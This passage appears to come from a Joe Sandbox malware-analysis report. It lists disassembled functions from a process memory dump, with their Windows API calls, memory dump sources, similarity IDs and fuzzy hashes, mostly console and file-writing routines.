                                                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: bea1164e48a24c48f3ffc4131b80514b1fe758536f2dae22eb469eb573b31b56
                                                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 14316B71A0024DABDF24DBA5DC84AEF77B9EF08344F04146AE505F2150DB349A44CB21
                                                                                                                                                                                                                                                                                                                                                      Function 00EE998D Relevance: 9.1, APIs: 6, Instructions: 89COMMON
                                                                                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 00EE9A11: _get_osfhandle.MSVCRT ref: 00EE9A1C
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 00EE9A11: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(00000000,00EE793A,00000104,?), ref: 00EE9A2B
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 00EE9A11: GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(000000F6,?,?,?,?,?,?,?,?,?,?,?,?,00EE7908,00002374,-00000001), ref: 00EE9A47
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 00EE9A11: AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(00F28E04,00000002,?,?,?,?,?,?,?,?,?,?,?,?,00EE7908,00002374), ref: 00EE9A56
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 00EE9A11: GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00EE7908,00002374), ref: 00EE9A61
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 00EE9A11: ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(00F28E04,?,?,?,?,?,?,?,?,?,?,?,?,00EE7908,00002374,-00000001), ref: 00EE9A6A
                                                                                                                                                                                                                                                                                                                                                      • AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(00F28E04,?,?,?,00F20AF0,00000002,?,?,00EFA669,%s %s ,?,?,00000000), ref: 00EE99DC
                                                                                                                                                                                                                                                                                                                                                      • _get_osfhandle.MSVCRT ref: 00EE99EC
                                                                                                                                                                                                                                                                                                                                                      • WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000,00EFA669,%s %s ,?,?,00000000), ref: 00EE99F4
                                                                                                                                                                                                                                                                                                                                                      • ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(00F28E04), ref: 00EE9A09
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 00EE9B3B: _get_osfhandle.MSVCRT ref: 00EE9B4E
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 00EE9B3B: WideCharToMultiByte.API-MS-WIN-CORE-STRING-L1-1-0(00000000,00F20AF0,000000FF,00F1A7F0,00002000,00000000,00000000), ref: 00EE9B8E
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 00EE9B3B: WriteFile.API-MS-WIN-CORE-FILE-L1-1-0(?,00F1A7F0,-00000001,?,00000000), ref: 00EE9BA3
                                                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                      • Source File: 00000007.00000002.1432672936.0000000000EE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432651828.0000000000EE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432703439.0000000000F0E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432728211.0000000000F2A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432728211.0000000000F2E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_ee0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                                                      • API ID: LockShared$_get_osfhandle$AcquireConsoleFileReleaseWrite$ByteCharHandleModeMultiTypeWide
                                                                                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                                                                                      • API String ID: 4057327938-0
                                                                                                                                                                                                                                                                                                                                                      • Opcode ID: 574cf37c0ebf30c0adbf1d417a44ce70708650057afd8eabdf498b5076ab7b0d
                                                                                                                                                                                                                                                                                                                                                      • Instruction ID: 0797660544c7427e82e338d4c57c6d5d6a8a26422706a94dbbbf6bfd38a94625
                                                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 574cf37c0ebf30c0adbf1d417a44ce70708650057afd8eabdf498b5076ab7b0d
                                                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3D21DB3230435DABD73566A65D86B7A32D8DB80755F31103EF606F61C3FEA1CC02A155
                                                                                                                                                                                                                                                                                                                                                      Function 00EE9B3B Relevance: 9.1, APIs: 6, Instructions: 88fileCOMMON
                                                                                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                                                      • _get_osfhandle.MSVCRT ref: 00EE9B4E
                                                                                                                                                                                                                                                                                                                                                      • WideCharToMultiByte.API-MS-WIN-CORE-STRING-L1-1-0(00000000,00F20AF0,000000FF,00F1A7F0,00002000,00000000,00000000), ref: 00EE9B8E
                                                                                                                                                                                                                                                                                                                                                      • WriteFile.API-MS-WIN-CORE-FILE-L1-1-0(?,00F1A7F0,-00000001,?,00000000), ref: 00EE9BA3
                                                                                                                                                                                                                                                                                                                                                      • WriteFile.API-MS-WIN-CORE-FILE-L1-1-0(00000000,00F20AF0,?,?,00000000), ref: 00EFC0BC
                                                                                                                                                                                                                                                                                                                                                      • WideCharToMultiByte.API-MS-WIN-CORE-STRING-L1-1-0(00000000,00F20AF0,00001000,00F1A7F0,00002000,00000000,00000000,00F20AEE), ref: 00EFC0DC
                                                                                                                                                                                                                                                                                                                                                      • WriteFile.API-MS-WIN-CORE-FILE-L1-1-0(?,00F1A7F0,00000000,?,00000000), ref: 00EFC0FA
                                                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                      • Source File: 00000007.00000002.1432672936.0000000000EE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432651828.0000000000EE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432703439.0000000000F0E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432728211.0000000000F2A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432728211.0000000000F2E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_ee0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                                                      • API ID: FileWrite$ByteCharMultiWide$_get_osfhandle
                                                                                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                                                                                      • API String ID: 3249344982-0
                                                                                                                                                                                                                                                                                                                                                      • Opcode ID: 57dcd1bf5b2c6d40b48e9fcdd8b3eceea9597eb0ea4cd7164a24bd1d1e53b360
                                                                                                                                                                                                                                                                                                                                                      • Instruction ID: f7a93e2b4652eb113120796bf3a8ec7a55ea07f879cfa612f81931a2d9f0805c
                                                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 57dcd1bf5b2c6d40b48e9fcdd8b3eceea9597eb0ea4cd7164a24bd1d1e53b360
                                                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4321B0B1A4024DBFEB248B65AC49FAB7BBDEB04754F204025F901F21D0E7B09E41D765
                                                                                                                                                                                                                                                                                                                                                      Function 00F07540 Relevance: 9.1, APIs: 3, Strings: 3, Instructions: 80COMMON
                                                                                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 00EEBC30: wcschr.MSVCRT ref: 00EEBCA7
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 00EEBC30: iswspace.MSVCRT ref: 00EEBD1D
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 00EEBC30: wcschr.MSVCRT ref: 00EEBD39
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 00EEBC30: wcschr.MSVCRT ref: 00EEBD5D
                                                                                                                                                                                                                                                                                                                                                      • _wcsicmp.MSVCRT ref: 00F075AC
                                                                                                                                                                                                                                                                                                                                                      • _wcsicmp.MSVCRT ref: 00F075CB
                                                                                                                                                                                                                                                                                                                                                      • _wcsicmp.MSVCRT ref: 00F075F1
                                                                                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                      • Source File: 00000007.00000002.1432672936.0000000000EE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432651828.0000000000EE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432703439.0000000000F0E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432728211.0000000000F2A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432728211.0000000000F2E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_ee0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                                                      • API ID: _wcsicmpwcschr$iswspace
                                                                                                                                                                                                                                                                                                                                                      • String ID: KEYS$LIST$OFF
                                                                                                                                                                                                                                                                                                                                                      • API String ID: 3924973218-4129271751
                                                                                                                                                                                                                                                                                                                                                      • Opcode ID: 88eccfd20094d60d4932e434a93cfdde2b0d91a21ddec188566289ce8d3fd13d
                                                                                                                                                                                                                                                                                                                                                      • Instruction ID: b8521aeae236102b55f6fd7b176d9d866a4a13b807a3b3d2a8504d5840c1b719
                                                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 88eccfd20094d60d4932e434a93cfdde2b0d91a21ddec188566289ce8d3fd13d
                                                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7B113032E0C7099BD329B726AC4B9B7B3D8EBD0770378405EF502560C0EE55B942F165
                                                                                                                                                                                                                                                                                                                                                      Function 00EEDD98 Relevance: 9.1, APIs: 6, Instructions: 61COMMON
                                                                                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                                                      • _get_osfhandle.MSVCRT ref: 00EEDDA3
                                                                                                                                                                                                                                                                                                                                                      • GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(00000000,00EFC050), ref: 00EEDDAD
                                                                                                                                                                                                                                                                                                                                                      • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(000000F6), ref: 00EEDDD6
                                                                                                                                                                                                                                                                                                                                                      • AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(00F28E04,00000001), ref: 00EEDDE5
                                                                                                                                                                                                                                                                                                                                                      • GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000,?), ref: 00EEDDF0
                                                                                                                                                                                                                                                                                                                                                      • ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(00F28E04), ref: 00EEDDF9
                                                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                      • Source File: 00000007.00000002.1432672936.0000000000EE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432651828.0000000000EE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432703439.0000000000F0E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432728211.0000000000F2A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432728211.0000000000F2E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_ee0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                                                      • API ID: LockShared$AcquireConsoleFileHandleModeReleaseType_get_osfhandle
                                                                                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                                                                                      • API String ID: 513048808-0
                                                                                                                                                                                                                                                                                                                                                      • Opcode ID: ef98dceeeb86bd8d7df5358daf159dc80dfac89bac10089ca86711756e0f35d7
                                                                                                                                                                                                                                                                                                                                                      • Instruction ID: 3a39dccf8b08beab526878a5a746efd062a255263d18bcf3ab8321f62fa2c414
                                                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ef98dceeeb86bd8d7df5358daf159dc80dfac89bac10089ca86711756e0f35d7
                                                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C011A93380C29CABD72147BA9D4CBBA37ACE74633DF255315E811F21E0DB754D02AA92
                                                                                                                                                                                                                                                                                                                                                      Function 00EE9A11 Relevance: 9.1, APIs: 6, Instructions: 53COMMON
                                                                                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                                                      • _get_osfhandle.MSVCRT ref: 00EE9A1C
                                                                                                                                                                                                                                                                                                                                                      • GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(00000000,00EE793A,00000104,?), ref: 00EE9A2B
                                                                                                                                                                                                                                                                                                                                                      • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(000000F6,?,?,?,?,?,?,?,?,?,?,?,?,00EE7908,00002374,-00000001), ref: 00EE9A47
                                                                                                                                                                                                                                                                                                                                                      • AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(00F28E04,00000002,?,?,?,?,?,?,?,?,?,?,?,?,00EE7908,00002374), ref: 00EE9A56
                                                                                                                                                                                                                                                                                                                                                      • GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00EE7908,00002374), ref: 00EE9A61
                                                                                                                                                                                                                                                                                                                                                      • ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(00F28E04,?,?,?,?,?,?,?,?,?,?,?,?,00EE7908,00002374,-00000001), ref: 00EE9A6A
                                                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                      • Source File: 00000007.00000002.1432672936.0000000000EE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432651828.0000000000EE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432703439.0000000000F0E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432728211.0000000000F2A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432728211.0000000000F2E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_ee0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                                                      • API ID: LockShared$AcquireConsoleFileHandleModeReleaseType_get_osfhandle
                                                                                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                                                                                      • API String ID: 513048808-0
                                                                                                                                                                                                                                                                                                                                                      • Opcode ID: 3473a84188b777fba57ef37583d349e75bd47a941ef57a79e227a919144ad51e
                                                                                                                                                                                                                                                                                                                                                      • Instruction ID: ed8915043f6b597ea62bc9fc6b54c1026a7ab56ad9b02e8f303ae863f4ca689a
                                                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3473a84188b777fba57ef37583d349e75bd47a941ef57a79e227a919144ad51e
                                                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: CB01A7338040A86B8631577A9C4DD7A36DCDB86738B251335E83EF20D1EA348D036151
                                                                                                                                                                                                                                                                                                                                                      Function 00EEDA30 Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 219COMMON
                                                                                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 00EEDCD0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000008,?,?,00EEACD8,00000001,?,00000000,00EE8C23,-00000105,00F0C9B0,00000240,00EF1E92,00000000,00000000,00EFACE0,00000000), ref: 00EEDCE1
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 00EEDCD0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,00EEACD8,00000001,?,00000000,00EE8C23,-00000105,00F0C9B0,00000240,00EF1E92,00000000,00000000,00EFACE0,00000000,00000000), ref: 00EEDCE8
                                                                                                                                                                                                                                                                                                                                                      • memset.MSVCRT ref: 00EFD954
                                                                                                                                                                                                                                                                                                                                                      • longjmp.MSVCRT(00F20A70,000000FF,00000000,00F125C2,00F125C0,?,?,?,?,00EED980), ref: 00EFD96D
                                                                                                                                                                                                                                                                                                                                                      • memcpy.MSVCRT(?,00000000,00002000,00000000,00F125C2,00F125C0,?,?,?,?,00EED980), ref: 00EFD987
                                                                                                                                                                                                                                                                                                                                                      • longjmp.MSVCRT(00F20A70,000000FF,00F125C2,00F125C0,?,?,?,?,00EED980), ref: 00EFD9D3
                                                                                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                      • Source File: 00000007.00000002.1432672936.0000000000EE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432651828.0000000000EE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432703439.0000000000F0E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432728211.0000000000F2A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432728211.0000000000F2E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_ee0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                                                      • API ID: Heaplongjmp$AllocProcessmemcpymemset
                                                                                                                                                                                                                                                                                                                                                      • String ID: 0123456789
                                                                                                                                                                                                                                                                                                                                                      • API String ID: 2034586978-2793719750
                                                                                                                                                                                                                                                                                                                                                      • Opcode ID: 6f98b8a7287efe261dae53f1b6f28587e3cbd84b264e9dcc969c9a74e40d609f
                                                                                                                                                                                                                                                                                                                                                      • Instruction ID: 3be794e3025312ae9f0b6209a19cc16bd615d55423f10d2c51951f98518d835b
                                                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6f98b8a7287efe261dae53f1b6f28587e3cbd84b264e9dcc969c9a74e40d609f
                                                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 53717A35B0824E8BCB149F69CC457BE77B6EB80304F299069D949F7380EB719E02DB90
                                                                                                                                                                                                                                                                                                                                                      Function 00EE5020 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 191COMMON
                                                                                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                                                      • memset.MSVCRT ref: 00EE5074
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 00EEE3F0: memset.MSVCRT ref: 00EEE455
                                                                                                                                                                                                                                                                                                                                                      • ??_V@YAXPAX@Z.MSVCRT(?,-00000001), ref: 00EE515F
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 00EEBC30: wcschr.MSVCRT ref: 00EEBCA7
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 00EEBC30: iswspace.MSVCRT ref: 00EEBD1D
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 00EEBC30: wcschr.MSVCRT ref: 00EEBD39
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 00EEBC30: wcschr.MSVCRT ref: 00EEBD5D
                                                                                                                                                                                                                                                                                                                                                      • iswspace.MSVCRT ref: 00EF9289
                                                                                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                      • Source File: 00000007.00000002.1432672936.0000000000EE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432651828.0000000000EE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432703439.0000000000F0E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432728211.0000000000F2A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432728211.0000000000F2E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_ee0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                                                      • API ID: wcschr$iswspacememset
                                                                                                                                                                                                                                                                                                                                                      • String ID: %s
                                                                                                                                                                                                                                                                                                                                                      • API String ID: 2220997661-3043279178
                                                                                                                                                                                                                                                                                                                                                      • Opcode ID: 3f35d23999b09feea23ac80a903bf1634ccd0888130054fe43f74b9737c20699
                                                                                                                                                                                                                                                                                                                                                      • Instruction ID: 60ea1629b6b615e8a2537da95cded4f98755ede0e8d0677bcbf760f6765d9f33
                                                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3f35d23999b09feea23ac80a903bf1634ccd0888130054fe43f74b9737c20699
                                                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D8513472E0055A9BDB24DFA99C426BBB3F5EF58308F1440ADE989F7241EB309D41CB90
                                                                                                                                                                                                                                                                                                                                                      Function 00F070D6 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 124memoryCOMMON
                                                                                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                                                      • RtlCreateUnicodeStringFromAsciiz.NTDLL(?,?), ref: 00F07121
                                                                                                                                                                                                                                                                                                                                                      • GlobalAlloc.API-MS-WIN-CORE-HEAP-L2-1-0(00000040,00000000), ref: 00F07197
                                                                                                                                                                                                                                                                                                                                                      • GlobalFree.API-MS-WIN-CORE-HEAP-L2-1-0(?), ref: 00F071FF
                                                                                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                                                                                      • %WINDOWS_COPYRIGHT%, xrefs: 00F07107
                                                                                                                                                                                                                                                                                                                                                      • Copyright (c) Microsoft Corporation. All rights reserved., xrefs: 00F070EE
                                                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                      • Source File: 00000007.00000002.1432672936.0000000000EE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432651828.0000000000EE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432703439.0000000000F0E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432728211.0000000000F2A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432728211.0000000000F2E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_ee0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                                                      • API ID: Global$AllocAsciizCreateFreeFromStringUnicode
                                                                                                                                                                                                                                                                                                                                                      • String ID: %WINDOWS_COPYRIGHT%$Copyright (c) Microsoft Corporation. All rights reserved.
                                                                                                                                                                                                                                                                                                                                                      • API String ID: 1103618819-4062316587
                                                                                                                                                                                                                                                                                                                                                      • Opcode ID: 893a14402843de5f63bd6ba579acd260007984d004acc0ccaa541be2002f0a48
                                                                                                                                                                                                                                                                                                                                                      • Instruction ID: 75ebcfd24145b358cef1941b8f90a642514e568a4044853ef4589fb25b380642
                                                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 893a14402843de5f63bd6ba579acd260007984d004acc0ccaa541be2002f0a48
                                                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: BB41D675F0435987CB20EB688C517BA73B1AF48750F6804A9E941EB3D0E675AD43F790
                                                                                                                                                                                                                                                                                                                                                      Function 00F02584 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 114COMMON
                                                                                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                                                      • CreateSemaphoreExW.API-MS-WIN-CORE-SYNCH-L1-1-0(00000000,00000000,00000001,?,00000000,001F0003,?,?,?,?), ref: 00F02652
                                                                                                                                                                                                                                                                                                                                                      • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00F02670
                                                                                                                                                                                                                                                                                                                                                      • SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000), ref: 00F02694
                                                                                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                      • Source File: 00000007.00000002.1432672936.0000000000EE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432651828.0000000000EE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432703439.0000000000F0E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432728211.0000000000F2A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432728211.0000000000F2E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_ee0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                                                      • API ID: ErrorLast$CreateSemaphore
                                                                                                                                                                                                                                                                                                                                                      • String ID: _p0$wil
                                                                                                                                                                                                                                                                                                                                                      • API String ID: 4049970386-1814513734
                                                                                                                                                                                                                                                                                                                                                      • Opcode ID: c6961765234b48acc2cdd869eebfbec076c33597b07b2c175234612668dcbd5d
                                                                                                                                                                                                                                                                                                                                                      • Instruction ID: 739261d117b55d8d46d17d5a7241e2870351ac5692626edf8f2a0bb01db7819e
                                                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c6961765234b48acc2cdd869eebfbec076c33597b07b2c175234612668dcbd5d
